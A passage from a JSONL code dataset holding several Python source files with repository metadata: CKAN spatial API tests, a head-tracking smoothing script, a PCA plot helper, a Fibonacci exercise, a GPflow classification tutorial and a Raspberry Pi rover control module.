1\n assert res_dict['results'][0] == package_id\n\n # Point outside bbox\n offset = self._offset_with_bbox(-10,10,-20,20)\n\n res = self.app.get(offset, status=200)\n res_dict = self.data_from_res(res)\n\n assert res_dict['count'] == 0\n assert res_dict['results'] == []\n\n # Delete the package and ensure it does not come up on\n # search results\n package_delete(context,{'id':package_id})\n offset = self._offset_with_bbox()\n\n res = self.app.get(offset, status=200)\n res_dict = self.data_from_res(res)\n\n assert res_dict['count'] == 0\n assert res_dict['results'] == []\n\n\n\nclass TestActionPackageSearch(SpatialTestBase,WsgiAppCase):\n\n @classmethod\n def setup_class(self):\n super(TestActionPackageSearch,self).setup_class()\n setup_test_search_index()\n self.package_fixture_data_1 = {\n 'name' : u'test-spatial-dataset-search-point-1',\n 'title': 'Some Title 1',\n 'extras': [{'key':'spatial','value':self.geojson_examples['point']}]\n }\n 
self.package_fixture_data_2 = {\n 'name' : u'test-spatial-dataset-search-point-2',\n 'title': 'Some Title 2',\n 'extras': [{'key':'spatial','value':self.geojson_examples['point_2']}]\n }\n\n CreateTestData.create()\n\n @classmethod\n def teardown_class(self):\n model.repo.rebuild_db()\n\n def test_1_basic(self):\n schema = default_create_package_schema()\n context = {'model':model,'session':Session,'user':'tester','extras_as_string':True,'schema':schema,'api_version':2}\n package_dict_1 = package_create(context,self.package_fixture_data_1)\n del context['package']\n package_dict_2 = package_create(context,self.package_fixture_data_2)\n\n postparams = '%s=1' % json.dumps({\n 'q': 'test',\n 'facet.field': ('groups', 'tags', 'res_format', 'license'),\n 'rows': 20,\n 'start': 0,\n 'extras': {\n 'ext_bbox': '%s,%s,%s,%s' % (10,10,40,40)\n }\n })\n res = self.app.post('/api/action/package_search', params=postparams)\n res = json.loads(res.body)\n result = res['result']\n\n # Only one dataset returned\n assert_equal(res['success'], True)\n assert_equal(result['count'], 1)\n assert_equal(result['results'][0]['name'], 'test-spatial-dataset-search-point-2')\n\n\nclass TestHarvestedMetadataAPI(WsgiAppCase):\n\n\n @classmethod\n def setup_class(cls):\n try:\n from ckanext.harvest.model import HarvestObject, HarvestJob, HarvestSource, HarvestObjectExtra\n except ImportError:\n raise SkipTest('The harvester extension is needed for these tests')\n\n cls.content1 = 'Content 1'\n ho1 = HarvestObject(guid='test-ho-1',\n job=HarvestJob(source=HarvestSource(url='http://', type='xx')),\n content=cls.content1)\n\n cls.content2 = 'Content 2'\n cls.original_content2 = 'Original Content 2'\n ho2 = HarvestObject(guid='test-ho-2',\n job=HarvestJob(source=HarvestSource(url='http://', type='xx')),\n content=cls.content2)\n\n hoe = HarvestObjectExtra(key='original_document',\n value=cls.original_content2,\n object=ho2)\n\n Session.add(ho1)\n Session.add(ho2)\n Session.add(hoe)\n Session.commit()\n\n cls.object_id_1 = ho1.id\n cls.object_id_2 = ho2.id\n\n\n def test_api(self):\n\n # Test redirects for old URLs\n url = '/api/2/rest/harvestobject/{0}/xml'.format(self.object_id_1)\n r = self.app.get(url)\n assert r.status == 301\n assert '/harvest/object/{0}'.format(self.object_id_1) in r.header_dict['Location']\n\n url = '/api/2/rest/harvestobject/{0}/html'.format(self.object_id_1)\n r = self.app.get(url)\n assert r.status == 301\n assert '/harvest/object/{0}/html'.format(self.object_id_1) in r.header_dict['Location']\n\n\n # Access object content\n url = '/harvest/object/{0}'.format(self.object_id_1)\n r = self.app.get(url)\n assert r.status == 200\n assert r.header_dict['Content-Type'] == 'application/xml; charset=utf-8'\n assert r.body == self.content1\n\n # Access original content in object extra (if present)\n url = '/harvest/object/{0}/original'.format(self.object_id_1)\n r = self.app.get(url, status=404)\n assert r.status == 404\n\n url = '/harvest/object/{0}/original'.format(self.object_id_2)\n r = self.app.get(url)\n assert r.status == 200\n assert r.header_dict['Content-Type'] == 'application/xml; charset=utf-8'\n assert r.body == self.original_content2\n\n # Access HTML transformation\n url = '/harvest/object/{0}/html'.format(self.object_id_1)\n r = self.app.get(url)\n assert r.status == 200\n assert r.header_dict['Content-Type'] == 'text/html; charset=utf-8'\n assert 'GEMINI record about' in r.body\n\n url = '/harvest/object/{0}/html/original'.format(self.object_id_1)\n r = self.app.get(url, status=404)\n 
assert r.status == 404\n\n        url = '/harvest/object/{0}/html'.format(self.object_id_2)\n        r = self.app.get(url)\n        assert r.status == 200\n        assert r.header_dict['Content-Type'] == 'text/html; charset=utf-8'\n        assert 'GEMINI record about' in r.body\n\n        url = '/harvest/object/{0}/html/original'.format(self.object_id_2)\n        r = self.app.get(url)\n        assert r.status == 200\n        assert r.header_dict['Content-Type'] == 'text/html; charset=utf-8'\n        assert 'GEMINI record about' in r.body\n","repo_name":"IFPRI/sda-ckan-ar","sub_path":"ckanext-spatial/ckanext/spatial/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"802634443","text":"#Required imports\r\nfrom collections import namedtuple\r\nimport time\r\n#Computer vision tools\r\nimport cv2\r\n\r\nimport tfg_utils as utils\r\n\r\n#Constants that define how the program finished\r\nERROR_VIDEO_FILE = 0\r\nSUCCESS = 1\r\n\r\n#Constant used to approximate the height of the head\r\nHUMAN_HEAD_RATIO = 7\r\n\r\n#Tuples\r\nVector2D = namedtuple(\"Vector2D\", \"x y\")\r\nRectangle = namedtuple(\"Rectangle\", \"x y w h\")\r\n\r\n#Runs the main program\r\ndef main():\r\n    return\r\n\r\ndef execute(input_file, output_file, video_file = None):\r\n    input_file = open(input_file, \"r\")\r\n    text_lines = input_file.read().splitlines()\r\n\r\n    video_width, video_height, video_fps = parse_video_dimensions(text_lines[0])\r\n\r\n    rectangles = parse_rectangles(text_lines)\r\n\r\n    head_positions = get_head_centers(rectangles)\r\n    smooth_positions = smooth_damp_head_positions(head_positions, video_fps)\r\n\r\n    output = open(output_file, \"w\")\r\n\r\n    for position in smooth_positions:\r\n        output.write(f'{position.x} {position.y}\\n')\r\n\r\n    output.close()\r\n\r\n    if not video_file is None:\r\n        show_result_in_video(video_file, head_positions, smooth_positions, video_fps)\r\n    \r\n    return SUCCESS\r\n\r\ndef parse_video_dimensions(string):\r\n    split = string.split(\" \")\r\n    return float(split[0]), float(split[1]), float(split[2])\r\n\r\ndef parse_rectangles(text_lines):\r\n    rectangles = []\r\n    for i in range(1, len(text_lines)):\r\n        rectangles.append(parse_rectangle(text_lines[i]))\r\n    return rectangles\r\n\r\ndef parse_rectangle(string):\r\n    split = string.split(\" \")\r\n    rect = Rectangle(float(split[1]), float(split[2]), float(split[3]), float(split[4]))\r\n    return rect\r\n\r\n#Estimates the center of the person's head\r\ndef aproximate_head_center(rect):\r\n    return Vector2D(rect.x + rect.w * 0.5, rect.y + rect.h / HUMAN_HEAD_RATIO)\r\n\r\n#Returns a list of approximate head positions\r\ndef get_head_centers(rectangles):\r\n    head_positions = []\r\n    for rect in rectangles:\r\n        head_center = aproximate_head_center(rect)\r\n        head_positions.append(head_center)\r\n    return head_positions\r\n\r\ndef smooth_damp_head_positions(head_positions, video_fps):\r\n\r\n    smooths = []\r\n    smooth_vector = Vector2D(head_positions[0].x, head_positions[0].y)\r\n\r\n    velocity_x = 0\r\n    velocity_y = 0\r\n\r\n    smooth_time = 0.50 # 0.085\r\n    delta_time = 1 / video_fps\r\n\r\n    for position in head_positions:\r\n        smooth_x, velocity_x = smooth_damp(smooth_vector.x, position.x, velocity_x, smooth_time, delta_time)\r\n        smooth_y, velocity_y = smooth_damp(smooth_vector.y, position.y, velocity_y, smooth_time, delta_time)\r\n\r\n        smooth_vector = Vector2D(smooth_x, smooth_y)\r\n        smooths.append(Vector2D(smooth_x, smooth_y))\r\n    
return smooths\r\n\r\ndef smooth_damp(current, target, currentVelocity, smoothTime, deltaTime):\r\n    smoothTime = Max(0.0001, smoothTime)\r\n    num1 = 2 / smoothTime\r\n    num2 = num1 * deltaTime\r\n    num3 = (1.0 / (1.0 + num2 + 0.479999989271164 * num2 * num2 + 0.234999999403954 * num2 * num2 * num2))\r\n    num4 = current - target\r\n    num5 = target\r\n    \r\n    target = current - num4\r\n    num7 = (currentVelocity + num1 * num4) * deltaTime\r\n    currentVelocity = (currentVelocity - num1 * num7) * num3\r\n    num8 = target + (num4 + num7) * num3\r\n\r\n    if ((num5 - current > 0.0) == (num8 > num5)):\r\n        num8 = num5\r\n        currentVelocity = (num8 - num5) / deltaTime\r\n\r\n    return num8, currentVelocity\r\n\r\ndef Max(a, b):\r\n    if (a > b):\r\n        return a\r\n    return b\r\n\r\n#Returns a video capture object used to extract the frames of the video\r\ndef initialize_video(video_file):\r\n    capture = cv2.VideoCapture(video_file)\r\n    #If the capture could not open the video, return None\r\n    if(not capture.isOpened()): return None\r\n    return capture\r\n\r\ndef show_result_in_video(video_file, head_positions, smooth_positions, video_fps):\r\n    video_capure = initialize_video(video_file)\r\n    if not video_capure is None:\r\n        frame_index = 0\r\n        while video_capure.isOpened():\r\n            #Read the next frame of the video\r\n            success, frame = video_capure.read()\r\n            #Stop if something fails or no frames remain\r\n            if frame is None or not success:\r\n                break\r\n\r\n            original_color = (0, 0, 255)\r\n            smooth_color = (0, 255, 0)\r\n\r\n            ox, oy = int(head_positions[frame_index].x), int(head_positions[frame_index].y)\r\n            sx, sy = int(smooth_positions[frame_index].x), int(smooth_positions[frame_index].y)\r\n\r\n            frame = cv2.rectangle(frame, (ox, oy),(ox + 2, oy + 2), original_color, 20)\r\n            frame = cv2.rectangle(frame, (sx, sy),(sx + 2, sy + 2), smooth_color, 20)\r\n            \r\n            frame = cv2.resize(frame, (960, 540))\r\n            cv2.imshow(\"Previsualizacion\", frame)\r\n            if cv2.waitKey(1) & 0xFF == ord('q'):\r\n                break\r\n\r\n            frame_index += 1\r\n            time.sleep(1 / (video_fps * 3))\r\n\r\n            if frame_index >= len(head_positions):\r\n                break\r\n        \r\n        # Release the video file\r\n        video_capure.release()\r\n        # Close the window where the image is shown\r\n        cv2.destroyAllWindows()\r\n\r\n#If this script is executed as main, invoke the main method\r\nif __name__ == '__main__': main()","repo_name":"jorequis/TFG","sub_path":"TFG_GPU/p2cropsmooth/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14480493669","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import decomposition\n\ndef plot3DView(features,prediction):\n    fig = plt.figure(1, figsize=(4, 3))\n    plt.clf()\n    ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n    plt.cla()\n\n    pca=decomposition.PCA(n_components=3)\n    pca.fit(features)\n    reducedFeatures=pca.transform(features)\n\n    for name, label in [('Normal', 1), ('Anomalous',-1)]:\n        ax.text3D(features[prediction == label, 0].mean(),\n                  features[prediction == label, 1].mean() + 1.5,\n                  features[prediction == label, 2].mean(), name,\n                  horizontalalignment='center',\n                  bbox=dict(alpha=.5, edgecolor='w', facecolor='w'))\n    # Reorder the labels to have colors matching the cluster results\n    #cy = np.choose(y, [1, -1]).astype(np.float)\n    ax.scatter(features[:, 0], features[:, 1], features[:, 2], c=prediction, cmap=plt.cm.spectral)\n 
ax.w_xaxis.set_ticklabels([])\n ax.w_yaxis.set_ticklabels([])\n ax.w_zaxis.set_ticklabels([])\n plt.show()\n return\n","repo_name":"KrMantavya/Anomaly-Detection-In-Videos","sub_path":"Scripts/drawFigure.py","file_name":"drawFigure.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"21295490397","text":"\"\"\"\r\nFibonacci\r\n\r\n\r\nThe Fibonacci sequence is one of the most famous formulas in mathematics.\r\nEach number in the sequence is the sum of the two numbers that precede it.\r\nFor example, here is the Fibonacci sequence for 10 numbers, starting from 0: 0,1,1,2,3,5,8,13,21,34.\r\n\r\nWrite a program to take N (variable num in code template) positive numbers as input, and recursively calculate and output the first N numbers of the Fibonacci sequence (starting from 0).\r\n\"\"\"\r\nnum = int(input())\r\n\r\n\r\ndef fibonacci(n):\r\n #complete the recursive function\r\n\tfrom functools import reduce\r\n\r\n\tfib = lambda n: reduce(lambda x, _: x+[x[-1]+x[-2]],\r\n\t\t\t\t\t\t\t\trange(n-2), [0, 1])\r\n\r\n\tx = fib(n)\r\n\tfor i in x:\r\n\t\tprint(i)\r\n\t\t\r\n\r\nfibonacci(num)\r\n","repo_name":"Virgo-Alpha/AlphaPython","sub_path":"fib.py","file_name":"fib.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20059569806","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,.pct.py:percent\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.3.3\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# %% [markdown]\n# # Basic (binary) GP classification model\n#\n#\n# This notebook shows how to build a GP classification model using variational inference.\n# Here we consider binary (two-class, 0 vs. 1) classification only (there is a separate notebook on [multiclass classification](../advanced/multiclass_classification.ipynb)).\n# We first look at a one-dimensional example, and then show how you can adapt this when the input space is two-dimensional.\n\n# %%\nimport numpy as np\nimport gpflow\nimport tensorflow as tf\n\nimport matplotlib.pyplot as plt\n\n# %matplotlib inline\n\nplt.rcParams[\"figure.figsize\"] = (8, 4)\n\n# %% [markdown]\n# ## One-dimensional example\n#\n# First of all, let's have a look at the data. `X` and `Y` denote the input and output values.\n# **NOTE:** `X` and `Y` must be two-dimensional NumPy arrays, $N \\times 1$ or $N \\times D$, where $D$ is the number of input dimensions/features, with the same number of rows as $N$ (one for each data point):\n\n# %%\nX = np.genfromtxt(\"data/classif_1D_X.csv\").reshape(-1, 1)\nY = np.genfromtxt(\"data/classif_1D_Y.csv\").reshape(-1, 1)\n\nplt.figure(figsize=(10, 6))\n_ = plt.plot(X, Y, \"C3x\", ms=8, mew=2)\n\n# %% [markdown]\n# ### Reminders on GP classification\n#\n# For a binary classification model using GPs, we can simply use a `Bernoulli` likelihood. The details of the generative model are as follows:\n#\n# __1. 
Define the latent GP:__ we start from a Gaussian process $f \\sim \\mathcal{GP}(0, k(\\cdot, \\cdot'))$:\n\n# %%\n# build the kernel and covariance matrix\nk = gpflow.kernels.Matern52(variance=20.0)\nx_grid = np.linspace(0, 6, 200).reshape(-1, 1)\nK = k(x_grid)\n\n# sample from a multivariate normal\nrng = np.random.RandomState(6)\n\nL = np.linalg.cholesky(K)\nf_grid = np.dot(L, rng.randn(200, 5))\nplt.plot(x_grid, f_grid, \"C0\", linewidth=1)\n_ = plt.plot(x_grid, f_grid[:, 1], \"C0\", linewidth=2)\n\n# %% [markdown]\n# __2. Squash them to $[0, 1]$:__ the samples of the GP are mapped to $[0, 1]$.\n# By default, GPflow uses the standard normal cumulative distribution function (inverse probit function): $p(x) = \\Phi(f(x)) = \\frac{1}{2} (1 + \\operatorname{erf}(x / \\sqrt{2}))$.\n# (This choice has the advantage that predictive mean, variance and density can be computed analytically, but any choice of invlink is possible, e.g. the logit $p(x) = \\frac{\\exp(f(x))}{1 + \\exp(f(x))}$. Simply pass another function as the `invlink` argument to the `Bernoulli` likelihood class.)\n\n# %%\ndef invlink(f):\n return gpflow.likelihoods.Bernoulli().invlink(f).numpy()\n\n\np_grid = invlink(f_grid)\nplt.plot(x_grid, p_grid, \"C1\", linewidth=1)\n_ = plt.plot(x_grid, p_grid[:, 1], \"C1\", linewidth=2)\n\n# %% [markdown]\n# __3. Sample from a Bernoulli:__ for each observation point $X_i$, the class label $Y_i \\in \\{0, 1\\}$ is generated by sampling from a Bernoulli distribution $Y_i \\sim \\mathcal{B}(g(X_i))$.\n\n# %%\n# Select some input locations\nind = rng.randint(0, 200, (30,))\nX_gen = x_grid[ind]\n\n# evaluate probability and get Bernoulli draws\np = p_grid[ind, 1:2]\nY_gen = rng.binomial(1, p)\n\n# plot\nplt.plot(x_grid, p_grid[:, 1], \"C1\", linewidth=2)\nplt.plot(X_gen, p, \"C1o\", ms=6)\n_ = plt.plot(X_gen, Y_gen, \"C3x\", ms=8, mew=2)\n\n# %% [markdown]\n# ### Implementation with GPflow\n#\n# For the model described above, the posterior $f(x)|Y$ (say $p$) is not Gaussian any more and does not have a closed-form expression.\n# A common approach is then to look for the best approximation of this posterior by a tractable distribution (say $q$) such as a Gaussian distribution.\n# In variational inference, the quality of an approximation is measured by the Kullback-Leibler divergence $\\mathrm{KL}[q \\| p]$.\n# For more details on this model, see Nickisch and Rasmussen (2008).\n#\n# The inference problem is thus turned into an optimization problem: finding the best parameters for $q$.\n# In our case, we introduce $U \\sim \\mathcal{N}(q_\\mu, q_\\Sigma)$, and we choose $q$ to have the same distribution as $f | f(X) = U$.\n# The parameters $q_\\mu$ and $q_\\Sigma$ can be seen as parameters of $q$, which can be optimized in order to minimise $\\mathrm{KL}[q \\| p]$.\n#\n# This variational inference model is called `VGP` in GPflow:\n\n# %%\nm = gpflow.models.VGP(\n (X, Y), likelihood=gpflow.likelihoods.Bernoulli(), kernel=gpflow.kernels.Matern52()\n)\n\nopt = gpflow.optimizers.Scipy()\nopt.minimize(m.training_loss, variables=m.trainable_variables)\n\n# %% [markdown]\n# We can now inspect the result of the optimization with `gpflow.utilities.print_summary(m)`:\n\n# %%\ngpflow.utilities.print_summary(m, fmt=\"notebook\")\n\n# %% [markdown]\n# In this table, the first two lines are associated with the kernel parameters, and the last two correspond to the variational parameters.\n# **NOTE:** In practice, $q_\\Sigma$ is actually parameterized by its lower-triangular square root $q_\\Sigma = 
q_\\text{sqrt} q_\\text{sqrt}^T$ in order to ensure its positive-definiteness.\n#\n# For more details on how to handle models in GPflow (getting and setting parameters, fixing some of them during optimization, using priors, and so on), see [Manipulating GPflow models](../understanding/models.ipynb).\n\n# %% [markdown]\n# ### Predictions\n#\n# Finally, we will see how to use model predictions to plot the resulting model.\n# We will replicate the figures of the generative model above, but using the approximate posterior distribution given by the model.\n\n# %%\nplt.figure(figsize=(12, 8))\n\n# bubble fill the predictions\nmu, var = m.predict_f(x_grid)\n\nplt.fill_between(\n x_grid.flatten(),\n np.ravel(mu + 2 * np.sqrt(var)),\n np.ravel(mu - 2 * np.sqrt(var)),\n alpha=0.3,\n color=\"C0\",\n)\n\n# plot samples\ntf.random.set_seed(6)\nsamples = m.predict_f_samples(x_grid, 10).numpy().squeeze().T\n\nplt.plot(x_grid, samples, \"C0\", lw=1)\n\n# plot p-samples\np = invlink(samples)\nplt.plot(x_grid, p, \"C1\", lw=1)\n\n# plot data\nplt.plot(X, Y, \"C3x\", ms=8, mew=2)\nplt.ylim((-3, 3))\n\n# %% [markdown]\n# ## Two-dimensional example\n#\n# In this section we will use the following data:\n\n# %%\nX = np.loadtxt(\"data/banana_X_train\", delimiter=\",\")\nY = np.loadtxt(\"data/banana_Y_train\", delimiter=\",\").reshape(-1, 1)\nmask = Y[:, 0] == 1\n\nplt.figure(figsize=(6, 6))\nplt.plot(X[mask, 0], X[mask, 1], \"oC0\", mew=0, alpha=0.5)\n_ = plt.plot(X[np.logical_not(mask), 0], X[np.logical_not(mask), 1], \"oC1\", mew=0, alpha=0.5)\n\n# %% [markdown]\n# The model definition is the same as above; the only important difference is that we now specify that the kernel operates over a two-dimensional input space:\n\n# %%\nm = gpflow.models.VGP(\n (X, Y), kernel=gpflow.kernels.SquaredExponential(), likelihood=gpflow.likelihoods.Bernoulli()\n)\n\nopt = gpflow.optimizers.Scipy()\nopt.minimize(\n m.training_loss, variables=m.trainable_variables, options=dict(maxiter=25), method=\"L-BFGS-B\"\n)\n# in practice, the optimization needs around 250 iterations to converge\n\n# %% [markdown]\n# We can now plot the predicted decision boundary between the two classes.\n# To do so, we can equivalently plot the contour lines $E[f(x)|Y]=0$, or $E[g(f(x))|Y]=0.5$.\n# We will do the latter, because it allows us to introduce the `predict_y` function, which returns the mean and variance at test points:\n\n# %%\nx_grid = np.linspace(-3, 3, 40)\nxx, yy = np.meshgrid(x_grid, x_grid)\nXplot = np.vstack((xx.flatten(), yy.flatten())).T\n\np, _ = m.predict_y(Xplot) # here we only care about the mean\nplt.figure(figsize=(7, 7))\nplt.plot(X[mask, 0], X[mask, 1], \"oC0\", mew=0, alpha=0.5)\nplt.plot(X[np.logical_not(mask), 0], X[np.logical_not(mask), 1], \"oC1\", mew=0, alpha=0.5)\n\n_ = plt.contour(\n xx,\n yy,\n p.numpy().reshape(*xx.shape),\n [0.5], # plot the p=0.5 contour line only\n colors=\"k\",\n linewidths=1.8,\n zorder=100,\n)\n\n# %% [markdown]\n# ## Further reading\n#\n# There are dedicated notebooks giving more details on how to manipulate [models](../understanding/models.ipynb) and [kernels](../advanced/kernels.ipynb).\n#\n# This notebook covers only very basic classification models. You might also be interested in:\n# * [Multiclass classification](../advanced/multiclass_classification.ipynb) if you have more than two classes.\n# * [Sparse models](../advanced/gps_for_big_data.ipynb). The models above have one inducing variable $U_i$ per observation point $X_i$, which does not scale to large datasets. 
Sparse Variational GP (SVGP) is an efficient alternative where the variables $U_i$ are defined at some inducing input locations $Z_i$ that can also be optimized.\n# * [Exact inference](../advanced/mcmc.ipynb). We have seen that variational inference provides an approximation to the posterior. GPflow also supports exact inference using Markov Chain Monte Carlo (MCMC) methods, and the kernel parameters can also be assigned prior distributions in order to avoid point estimates.\n#\n# ## References\n#\n# Hannes Nickisch and Carl Edward Rasmussen. 'Approximations for binary Gaussian process classification'. *Journal of Machine Learning Research* 9(Oct):2035--2078, 2008.\n","repo_name":"david-gomez-guillen/phd","sub_path":"resources/libraries/GPflow/doc/source/notebooks/basics/classification.pct.py","file_name":"classification.pct.py","file_ext":"py","file_size_in_byte":9219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"12414030199","text":"#!/usr/bin/python -OO\n\n\n'''.\nFuctionality for my squid 8wd rover\n\n@organization: Steelsquid\n@author: Andreas Nilsson\n@contact: steelsquid@gmail.com\n@license: GNU Lesser General Public License v2.1\n@change: 2016-03-13 Created\n'''\n\n\nimport steelsquid_utils\nimport steelsquid_pi\nimport steelsquid_kiss_global\nimport steelsquid_nm\nimport steelsquid_kiss_boot\nimport time\nimport datetime\nimport steelsquid_hmtrlrs\nfrom decimal import Decimal\nfrom espeak import espeak\nespeak.set_voice(\"sv+f5\")\n\n# Is this module started\n# This is set by the system automatically.\nis_started = False\n\n\ndef enable(argument=None):\n '''\n When this module is enabled what needs to be done (execute: steelsquid module XXX on)\n Maybe you need create some files or enable other stuff.\n argument: Send data to the enable or disable method in the module\n Usually a string to tell the start/stop something\n '''\n # Clear any saved settings for this module\n steelsquid_kiss_global.clear_modules_settings(\"kiss_squidrover\")\n # Enable transeiver as client\n steelsquid_kiss_global.hmtrlrs_status(\"server\")\n # Disable the automatic print if IP to LCD...this module will do it\n steelsquid_utils.set_flag(\"no_net_to_lcd\")\n # Change GPIO for transceiver\n #steelsquid_utils.set_parameter(\"hmtrlrs_config_gpio\", str(STATIC.hmtrlrs_config_gpio))\n #steelsquid_utils.set_parameter(\"hmtrlrs_reset_gpio\", str(STATIC.hmtrlrs_reset_gpio))\n\n\ndef disable(argument=None):\n '''\n When this module is disabled what needs to be done (execute: steelsquid module XXX off)\n Maybe you need remove some files or disable other stuff.\n argument: Send data to the enable or disable method in the module\n Usually a string to tell the start/stop something\n '''\n # Enable the automatic print if IP to LCD\n steelsquid_utils.del_flag(\"no_net_to_lcd\")\n # Remove the voltage warning and power off (lipo 4s)\n steelsquid_utils.del_parameter(\"voltage_warning\")\n # Disable the HM-TRLR-S\n steelsquid_kiss_global.hmtrlrs_status(None)\n\n\n\n\n\n\nclass STATIC(object):\n '''\n Put static variables here (Variables that never change).\n It is not necessary to put it her, but i think it is kind of nice to have it inside this class.\n '''\n \n # voltage warning (lipo 7s)\n voltage_warning = 24.5\n \n # Max motor speed\n motor_max = 1000\n \n # Max slow speed\n # When the battery is mor than 24 volt (when i use 2 * 14.8V)\n motor_slow_max = 800\n\n # When system start move servo here\n servo_position_pan_start = 370\n\n # Max Servo 
position\n servo_position_pan_max = 590\n\n # Min Servo position\n servo_position_pan_min = 180\n\n # When system start move servo here\n servo_position_tilt_start = 400\n\n # Max Servo position\n servo_position_tilt_max = 530\n\n # Min Servo position\n servo_position_tilt_min = 280\n\n\n\n\n\n\nclass DYNAMIC(object):\n '''\n Put dynamic variables here.\n If you have variables holding some data that you use and change in this module, you can put them here.\n Maybe toy enable something in the WEB class and want to use it from the LOOP class.\n Instead of adding it to either WEB or LOOP you can add it here.\n It is not necessary to put it her, but i think it is kind of nice to have it inside this class.\n '''\n \n # Last LCD message to print\n last_lcd_message = None\n \n # Using this when i print a message to LCD, so the next ip/voltage uppdat dont ovrewrite the message to fast\n stop_next_lcd_message = False\n\n # Using this to know when to turn on and off the cruise control\n cruise_enabled = False\n\n # Current max speed of the motors\n # Can eider be STATIC.motor_max or STATIC.motor_slow_max\n current_max = STATIC.motor_max\n\n\n\n\n\nclass SETTINGS(object):\n '''\n The system will try to load settings with the same name as all variables in the class SETTINGS.\n If the variable value is Boolean: steelsquid_utils.get_flag(\"variable_name\")\n If the variable value is Integer, Float, String: steelsquid_utils.get_parameter(\"variable_name\")\n If the variable value is Array []: steelsquid_utils.get_list(\"variable_name\")\n The variable value will also be used as default value if the paramater or list not is found\n When the system shutdowen the value of the variable will also be saved to disk\n EX: this_is_a_flag = False\n this_is_a_parameter = \"a_default_value\"\n this_is_a_list = []\n System try to read: steelsquid_utils.get_flag(\"this_is_a_flag\")\n System try to read: steelsquid_utils.get_parameter(\"this_is_a_parameter\", \"a_default_value\")\n System try to read: steelsquid_utils.get_list(\"this_is_a_list\", [])\n If you want to disable save and read the settings from disk add a variable like this.\n This is usefull under development if you wan to test different values when you restart the module,\n otherwise the value from the first execution to be used ...\n _persistent_off = True\n To sum up: Variables in class SETTINGS that has value: Boolean, Array, Integer, Float, String will be will be persistent.\n '''\n \n # This will tell the system not to save and read the settings from disk\n _persistent_off = False\n \n \n\n\n\n\nclass SYSTEM(object):\n '''\n Methods in this class will be executed by the system if module is enabled\n on_start() exist it will be executed when system starts (boot)\n on_stop() exist it will be executed when system stops (shutdown)\n on_network(status, wired, wifi_ssid, wifi, wan) exist it will be execute on network up or down\n on_vpn(status, name, ip) This will fire when a VPN connection is enabled/disabled.\n on_bluetooth(status) exist it will be execute on bluetooth enabled\n on_mount(type_of_mount, remote, local) This will fire when USB, Samba(windows share) or SSH is mounted.\n on_umount(type_of_mount, remote, local) This will fire when USB, Samba(windows share) or SSH is unmounted.\n on_event_data(key, value) exist it will execute when data is changed with steelsquid_kiss_global.set_event_data(key, value)\n '''\n\n @staticmethod\n def on_start():\n '''\n This will execute when system starts\n Do not execute long running stuff here, do it in 
on_loop...\n '''\n # Startup message\n steelsquid_utils.shout(\"Steelsquid SquidRover started\")\n # Enable network by default\n try:\n steelsquid_nm.set_network_status(True) \n except:\n pass\n GLOBAL.camera(STATIC.servo_position_pan_start, STATIC.servo_position_tilt_start)\n \n \n @staticmethod\n def on_stop():\n '''\n This will execute when system stops\n Do not execute long running stuff here\n '''\n GLOBAL.drive(0, 0)\n steelsquid_pi.cleanup() \n \n \n \n\n\n\nclass LOOP(object):\n '''\n Every static method with no inparameters will execute over and over again untill it return None or -1\n If it return a number larger than 0 it will sleep for that number of seconds before execute again.\n If it return 0 it will not not sleep, will execute again immediately.\n Every method will execute in its own thread\n '''\n \n last_value = None\n \n @staticmethod\n def update_lcd_and_voltage():\n '''\n Execute every 2 second\n ''' \n try:\n # Print IP/voltage to LCD\n if not DYNAMIC.stop_next_lcd_message:\n print_this = []\n print_this.append(steelsquid_utils.get_date_time())\n connected = False\n # Get network status\n if steelsquid_kiss_global.last_net:\n if steelsquid_kiss_global.last_wifi_name!=\"---\":\n print_this.append(steelsquid_kiss_global.last_wifi_name)\n print_this.append(steelsquid_kiss_global.last_wifi_ip)\n connected=True\n if steelsquid_kiss_global.last_lan_ip!=\"---\":\n print_this.append(steelsquid_kiss_global.last_lan_ip)\n connected=True\n # Write text to LCD\n if len(print_this)>0:\n new_lcd_message = \"\\n\".join(print_this)\n if new_lcd_message!=DYNAMIC.last_lcd_message:\n DYNAMIC.last_lcd_message = new_lcd_message\n steelsquid_pi.ssd1306_write(new_lcd_message, 0)\n else:\n DYNAMIC.stop_next_lcd_message=False\n # Read rover voltage\n RADIO_SYNC.SERVER.voltage_rover = GLOBAL.voltage()\n except:\n if steelsquid_kiss_boot.running:\n steelsquid_utils.shout()\n return 2 # Execute this method again in 2 second\n \n \n \n #@staticmethod\n #def camera_stabilisation():\n # '''\n # Stabilitate the camera around the x rotation\n # ''' \n # try:\n # x, y = steelsquid_pi.mpu6050_rotation(samples=11)\n # x = int(x)\n # print x\n # RADIO_PUSH_2.camera_tilt = STATIC.servo_position_tilt_start+(x*3)\n # GLOBAL.camera(None, RADIO_PUSH_2.camera_tilt)\n # except:\n # pass\n # return 0.001\n\n\n\n\nclass RADIO(object):\n '''\n If you have a NRF24L01+ or HM-TRLR-S transceiver connected to this device you can use server/client or master/slave functionality.\n HM-TRLR-S\n Enable the HM-TRLR-S server functionality in command line: set-flag hmtrlrs_server\n On client device: set-flag hmtrlrs_client\n Must restart the steelsquid daeomon for it to take effect.\n In python you can do: steelsquid_kiss_global.hmtrlrs_status(status)\n status: server=Enable as server\n client=Enable as client\n None=Disable\n SERVER/CLIENT:\n If the clent execute: data = steelsquid_hmtrlrs.request(\"a_command\", data)\n A method with the name a_command(data) will execute on the server in class RADIO.\n The server then can return some data that the client will reseive...\n You can also execute: 